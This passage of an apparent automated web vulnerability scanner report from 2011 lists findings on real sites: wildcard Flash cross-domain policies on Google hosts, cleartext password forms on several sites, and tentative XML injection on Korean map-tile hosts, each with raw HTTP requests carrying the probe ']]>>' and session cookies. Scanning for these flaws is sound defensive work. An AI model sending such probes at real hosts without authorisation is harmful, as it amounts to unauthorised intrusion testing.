<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.12. http://picasaweb.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Tue, 19 Jul 2011 02:20:35 GMT
Date: Mon, 18 Jul 2011 02:20:35 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

4.13. http://docs.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 18 Jul 2011 11:39:17 GMT
Date: Sun, 17 Jul 2011 11:39:17 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 52615

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.14. http://khm0.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: khm0.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:16:35 GMT
Expires: Mon, 18 Jul 2011 02:16:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.15. http://khm1.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://khm1.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: khm1.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:16:36 GMT
Expires: Mon, 18 Jul 2011 02:16:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.16. http://mt0.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt0.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt0.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:17:07 GMT
Expires: Mon, 18 Jul 2011 02:17:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.17. http://mt1.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt1.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt1.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:17:33 GMT
Expires: Mon, 18 Jul 2011 02:17:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.18. http://mt2.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt2.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt2.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:18:06 GMT
Expires: Mon, 18 Jul 2011 02:18:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

4.19. http://mt3.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mt3.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mt3.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Mon, 18 Jul 2011 02:18:51 GMT
Expires: Mon, 18 Jul 2011 02:18:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-conte
...[SNIP]...
<allow-access-from domain="maps.googleapis.com"/>
<allow-access-from domain="maps-api-ssl.googleapis.com"/>
<allow-access-from domain="maps.gstatic.com"/>
<allow-access-from domain="maps.gstatic.cn"/>
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-domaintools-binoculars-contest-winners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/06/fun-friday-domaintools-binoculars-contest-winners/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=fd758ee59d9a85339151894b66241298; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2037>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

5.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-win-these-domaintools-binoculars/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/06/fun-friday-win-these-domaintools-binoculars/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=f9707fa0e69cbe5286747625fb5c8a87; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2001>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

5.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:04 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=534894b03dca4c10b8fdad94d3f3915b; expires=Tue, 19 Jul 2011 02:16:04 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2057>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

5.4. http://cache.vzw.com/globalnav/globalnav.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /globalnav/globalnav.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /globalnav/globalnav.js?v=11-07 HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: V1Z2=3xlMvMj_CbTxnhht02f2kBIf0Q_iHTboFH9keTnkzyH6sfkWs7khIog

Response

HTTP/1.1 200 OK
Server: None
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Jul 2011 03:09:35 GMT
ETag: "13207-4e1faf6f"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 78343
Date: Mon, 18 Jul 2011 13:01:23 GMT
Connection: close

/*******************************************************************************
Version 11.7.7 GlobalNav.js - js functions for creating the globalnav
*********************************************
...[SNIP]...
</div>';
           };

           div.innerHTML +=
               '<form id="signInForm" method="post" action="'+ this.loggedInURL +'" autocomplete="off">'+
       
               '<input type="hidden" name="goto" id="goto" value="'+ this.goTo +'"/>
...[SNIP]...
</label>'+
               '<input type="password" onfocus="inputSignIn(this,event)" onblur="inputSignIn(this,event)" autocomplete="off" maxlength="20" name="IDToken2" id="IDToken2_GN" value="" /><div class="clear15">
...[SNIP]...

5.5. http://support.dnsstuff.com/Login.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.dnsstuff.com
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Login.aspx HTTP/1.1
Host: support.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://support.dnsstuff.com/Main/Default.aspx
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.7.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=629fad8433489d10f91fe22b85337a2c; ID=f3d6c1ad003861; ASP.NET_SessionId=54ocirjmvwc4xy45do1kfw55; siteuidut=3f03185aa4854245bf4232ef4c0a1a49

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:20:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7476


<?xml version="1.0" encoding="UTF-8" ?>

<!-- ... -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="h
...[SNIP]...
<body class="Login ltr" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx" id="aspnetForm">
<div>
...[SNIP]...
<br />
               <input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="2" style="width: 100%" />
           </td>
...[SNIP]...

6. XML injection  previous  next
There are 8 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


6.1. http://mt0.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt0.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt0.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:46 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 1
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.2. http://mt0.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt0.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt0.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:17 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.3. http://mt1.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt1.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt1.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:15 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 1
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.4. http://mt1.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt1.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt1.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:18:06 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.5. http://mt2.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt2.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt2.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
